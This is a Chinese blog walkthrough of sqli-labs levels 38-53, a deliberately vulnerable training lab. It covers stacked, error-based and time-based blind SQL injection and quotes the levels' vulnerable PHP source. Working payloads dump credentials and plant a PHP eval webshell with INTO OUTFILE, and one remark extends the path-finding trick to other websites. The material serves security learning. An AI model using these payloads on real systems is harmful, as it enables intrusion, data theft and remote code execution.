sqli-labs-Stacked

最新推荐文章于 2024-07-21 21:56:19 发布
最新推荐文章于 2024-07-21 21:56:19 发布
阅读量671 收藏
点赞数
分类专栏: web 文章标签: web安全 php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123019586
版权
本文详细介绍了SQL注入漏洞中的StackedInjection和ErrorBases两种类型,通过实例展示了如何利用GET和POST请求进行SQL注入,包括闭合方式、盲注技巧以及利用注入创建新用户和获取系统信息。同时,探讨了错误回显在盲注中的作用以及如何通过注入执行恶意代码。
摘要由CSDN通过智能技术生成

文章目录

一. Stacked Injection

Stacked injection, 可以翻译成堆叠注入,即执行多个sql语句。

做到page 3,总结下sqli lab这个靶场的套路吧,它的题先是简单的知识点,然后换下闭合,然后换下注入方式(union–>报错–>盲注–>,,,),再然后换下请求方式(GET,POST)。

38. GET-single quotes

在第1题基础上,查询到用户表users,以及其字段(id, username, password)后,可以新建用户:

?id=1';INSERT INTO users(id, username, password) values(38, "38", "38"); -- x

看下源码:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}

39.

相比38,没有了引号闭合。

40-41.

40题,闭合变成了引号加括号 :

?id=1')||('

题目是盲注,去掉了报错信息,然并软,因为并没有用到updatexml。

?id=1');INSERT INTO users(id, username, password) values(40, "40", "40"); -- x

41和40一样。

42. POST-single quotes

有点像24题,通过创建新用户完成的二次注入。但是点击注册后,提示If you need to create account, then hack your way in

那就按套路,尝试一下万能账户/密码吧。

username
' or '1'='1		失败
" or "1"="1		失败
') or ('1'='1
password
' or '1'='1		登录成功

登录进去以后,和24题一样,可以修改密码,不过需要输入老密码。

既然已经找到了注入点为password,那可以用报错注入的套路:

-- 库名
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
-- XPATH syntax error: '~security~'

-- 表名
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479  limit 3,1),0x7e),1) -- x
-- XPATH syntax error: '~users~'

-- 列名
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~id~'
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~username~'
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),0x7e),1) -- x
-- XPATH syntax error: '~password~'

-- 密码
' or updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~Dumb~Dumb~'

刚刚登录的账户应该就是users表的第一个账户(limit 0,1),密码为Dumb。

不过这个题的目的在于考察堆叠注入,再试试password:

';INSERT INTO users(id, username, password) values(42, "42", "42");  -- x

页面显示登录错误,但id=42的用户已经创建成功了,username/password为42/42,登录成功。

源码:

<?PHP

session_start();
//...
function sqllogin($host,$dbuser,$dbpass, $dbname){
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);

    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);      // 过滤了username
    $password = $_POST["login_password"];

    // ...


    /* execute multi query */

   
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
   if (@mysqli_multi_query($con1, $sql))        // 可以执行多个语句!!!!!!!!!!!!!
   {
        /* store first result set */
        if($result = @mysqli_store_result($con1))
        {
            if($row = @mysqli_fetch_row($result))
            {
                if ($row[1])
                {
                    return $row[1];
                }
                else
                {
                    return 0;
                }
            }
        }
        else 
        {
            print_r(mysqli_error($con1));
        }
    }
    else 
    {
        print_r(mysqli_error($con1));
    }
}





$login = sqllogin($host,$dbuser,$dbpass, $dbname);
if (!$login== 0) 
{
	$_SESSION["username"] = $login;
	setcookie("Auth", 1, time()+3600);  /* expire in 15 Minutes */
	header('Location: logged-in.php');
} 
else
{
?>
    <!-- BUG OFF YOUR SILLY DUMB HACKER -->
<?php
} 
?>

相比13关,对username进行了过滤。

43. twist 42

尝试万能账户密码:

password
' or '1'='1		
') or ('1'='1	登录成功

其实就是42题基础上 闭合加了个括号

');INSERT INTO users(id, username, password) values(43, "43", "43");  -- x

44. Blind 42

和42一样,只不过去掉了print_r(mysqli_error($con1)),不能使用updatexml了,需要盲注password来获取users表的信息:

-- 库名
' or  length(database())=8 -- x
' or ascii(substr(lower(database()),1,1))=115 -- s
' or ascii(substr(lower(database()),2,1))=101 -- e
' or ascii(substr(lower(database()),3,1))=99  -- c
' or ascii(substr(lower(database()),4,1))=117 -- u
' or ascii(substr(lower(database()),5,1))=114 -- r
' or ascii(substr(lower(database()),6,1))=105 -- i
' or ascii(substr(lower(database()),7,1))=116 -- t
' or ascii(substr(lower(database()),8,1))=121 -- y

-- 表名
' or ascii(substr(lower((select table_name from information_schema.tables where table_schema=database() limit 3,1)),1,1))=117 -- u
-- ...

-- 列名
' or ascii(substr(lower((select column_name from information_schema.columns where table_schema='security' limit 0,1)),1,1))=105 -- i
-- ...

payload:

';INSERT INTO users(id, username, password) values(44, "44", "44");  -- x

45.twist 44

44题闭合加个括号。

50. GET-Order by

46题基础上,源码使用了mysqli_multi_query。46题wp在[这里](#46. GET-Order by)。

这次不新增账户了,练一下写马。

记着打开my.ini的对应开关:

[mysqld]
secure_file_priv=
...

paylaod:

?sort=1; select '<?php eval($_REQUEST[222])?>' into outfile 'c:\\50.php';

然后1.php就会出现在c盘根目录下。

但为了拿到webshell,需要知道www的绝对路径。可以这样获取:

?sort=1 and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1)
-- XPATH syntax error: '~C:\phpstudy_pro\Extensions\MySQ'

虽然错误回显被截断了,但可以推断出www的路径为C:\phpstudy_pro\www

?sort=1; select '<?php eval($_REQUEST[222])?>' into outfile 'C:\\phpstudy_pro\\www\\50.php';

然后就可以创建webshell了。

其它网站可以通过访问不存在的url来尝试在报错信息里获取www绝对路径。

51. Single Quotes 50

判断闭合:

?sort=1'	 报错
?sort=1''    正常回显

也就是说在50题基础上加了单引号闭合:

?sort=1'; select '<?php eval($_REQUEST[222])?>' into outfile 'c:\\phpstudy_pro\\www\\51.php'; -- x

52. Blind 50

去掉了错误回显,需要盲注。

48题和50题的payload都能使用。

53. Single quote 52

52题闭合加了单引号。

可使用51题和49题的payload。

二. Error Bases

46. GET-Order by

页面提示:Please input parameter as SORT with numeric value

url加参数:

?sort=1

然后展示了users表的内容,更改sort的值为2,3就能发现,sort值被填充到order by后面了。

猜测sql语句:

select * from users order by $sort;

如果可以堆叠注入的话,就这样构造payload:

select * from users order by $sort; INSERT INTO users(id, username, password) values(46, "46", "46");

-->

?sort=1; INSERT INTO users(id, username, password) values(46, "46", "46");

然后就报语法错误了。。。

再次提醒按套路一步步来。

使用union select:

?sort=1 union select 1,2,3

返回报错:Incorrect usage of UNION and ORDER BY。

既然语法上不允许,那用updatexml试试:

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
-- XPATH syntax error: '~security~'

成功。

看下源码:

<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];	
if(isset($id))
	{


	$sql = "SELECT * FROM users ORDER BY $id";
	$result = mysql_query($sql);
	if ($result)
		{
		?>
		<center>
		<font color= "#00FF00" size="4">
		
		<table   border=1'>
		<tr>
			<th>&nbsp;ID&nbsp;</th>
			<th>&nbsp;USERNAME&nbsp;  </th>
			<th>&nbsp;PASSWORD&nbsp;  </th>
		</tr>
		</font>
		</font>
		<?php
		while ($row = mysql_fetch_assoc($result))
			{
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			}	
		
		}
		else
		{
		print_r(mysql_error());
		}
	}	
	else
	{
		echo "Please input parameter as SORT with numeric value<br><br><br><br>";
		//...
	}
?>

47. Single quote 46

判断闭合,多了个引号:

?sort=1'   报错
?sort=1''  正常

payload:

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '
-- XPATH syntax error: '~security~'

48. Blind 46

使用46题的payload:

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

没有回显表格,那么考虑使用盲注。

?sort=1 and length(database())=8
?sort=1 and length(database())=7

无论猜测库名长度是多少,都正常回显表格,也就是说布尔盲注无效。这时要考虑时间盲注了。

-- 库名长度 8
?sort=1 and if(length(database())=8, sleep(5), 1)	-- 延时
?sort=1 and if(length(database())=7, sleep(5), 1)	-- 马上加载完毕

-- 爆破库名
?sort=1 and if(ascii(substr(lower(database()),1,1))=115,sleep(5),1)
-- ...

-- 表名
?sort=1 and if(ascii(substr(lower((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1))=101,sleep(5),1)
-- ...


-- 字段名
?sort=1 and if(ascii(substr(lower((select column_name from information_schema.columns where table_name='emails' limit 0,1)),1,1))=105,sleep(5),1)
-- ...

49. Single quote 48

48题基础上加了单引号闭合,payload除了加单引号,还要加一下注释:

?sort=1' and if(length(database())=8, sleep(5), 1) -- x
CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs通关记录
qq_39670065的博客
07-11 2524
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs 23-35闯关
小龙在线
09-24 628
第二十三关:过滤#和–注释+单引号闭合绕过+报错注入 单引号闭合绕过注入 # 获取数据库 id=0' union select 1,2,database()' id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata where 1='1 # Your Password:information_schema,security # 获取数据库 id=0' union select 1,2,group_c
sqli-labs大详解
gankjk的博客
10-19 6634
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
sqli-labs注入方法总结
wutiangui的博客
09-23 272
用户名:1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1’) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+删除bp原先的cookie,使用以下语句。
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
SQL注入万字详解,基于sqli-labs(手注+sqlmap)
最新发布
2401_82985722的博客
07-21 911
SQL 是 Structured Query Language 的缩写,中文译为“结构化查询语言”。SQL 是用于访问和处理数据库的标准的计算机语言。SQL 指结构化查询语言SQL 使我们有能力访问数据库SQL 是一种 ANSI 的标准计算机语言Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。在SQL数据库中,每条语句是以;
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 946
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
web靶场 --- sqli-labs
L0g1c的博客
07-06 1394
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sqli-labs闯关笔记(Stacked Injections)
末初的CSDN博客
05-12 457
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-38Less-39Less-40Less-41Less-42Less-43Less-44Less-45Less-46Less-47Less-48Less-49Less-50Less-51Less-52Less-53 正文(堆叠注入) Less-38 使用了一系列执行mysql多条语句查询的函数,导致存在堆叠注入,但是因为源码中一般只返回预期结果,所以堆叠注入的结果回显或者报错就无法.
sqli-labs.rar
07-06
"sqli-labs"是一个专门用于学习和测试SQL注入技术的渗透靶场,由印度的安全研究者创建,为网络安全专业人士提供了一个实践和提升SQL注入防御能力的平台。 靶场通常包含一系列逐渐增加难度的挑战,让用户从基础到...
sqli-labs-master
08-22
3. 多种注入技术:sqli-labs涵盖了不同的注入技术,如盲注(Blind SQL Injection)、时间延迟注入(Time-Based SQL Injection)、报错注入(Error-Based SQL Injection)和堆叠查询注入(Stacked Queries Injection...
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 709
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
HTTPS双向认证
Starr
02-28 7086
文章目录双向认证服务端客户端(问题残留) 双向认证 C/S两端分别生成密钥对,交换公钥,基于公钥验证另一端。 第一步,创建密钥对,把公钥存储为自签名、PEM编码的证书。用openssl即可,这里以一个HTTPS服务端为例: openssl req -nodes -x509 -newkey rsa:4096 -keyout serverKey.pem -out serverCrt.pem -days 365 serverKey.pem包含服务器的私钥,需要保护;serverCrt.pem包含服务器的公钥,用
sqlmap功能梳理
Starr
03-13 2348
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效值替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
WebSec-php Unserialize
Starr
12-24 2187
文章目录About PHP Serialize and Unserialize靶场练习pikachu About PHP Serialize and Unserialize 序列化:把一个对象变成可传输或存储的形式。反之则是反序列化。 <?php class Foobar{ public $v1 = "1"; protected $v2 = "22"; private $v3 = "333";
WebSec-SSRF
Starr
12-24 2132
文章目录1. About SSRF2. 靶场练习pikachussrf(curl)ssrf(file_get_content) 1. About SSRF SSRF, Server-Side Request Forgery, 服务器端请求伪造 和CSRF做好区分。 漏洞原因:服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 PHP中下面函数的使用不当会导致SSRF: file_get_cont
DVWA 文件包含及上传漏洞
Starr
03-07 2107
文章目录1. DVWA File InclusionLow levelMedium levelHigh levelImpossible level2. DVWA File uploadLow levelMedium levelHigh levelImpossible Level 1. DVWA File Inclusion Low level url路径: /dvwa/vulnerabilities/fi/index.php?page=include.php 可以看出page参数对应的php会被包含,尝试
WebSec-Over Permission
Starr
12-24 2063
文章目录1. 关于越权2. 靶场练习2.1 pikachu水平越权垂直越权 1. 关于越权 两种,水平越权和垂直越权。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方。 后台权限管理中应该遵守: 使用最小权限原则对用户进行赋权; 使用合理(严格)的权限校验规则; 使用后台登录态作为条件进行权限判断,别动不动就瞎用前端传进来的条件; 后台检查登录状态不够严谨,可能导致越权。 挖掘方法: 登录后,增删改查操作抓一下包,修改用户名试试; 分析管理员操作的数据包,尝试使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值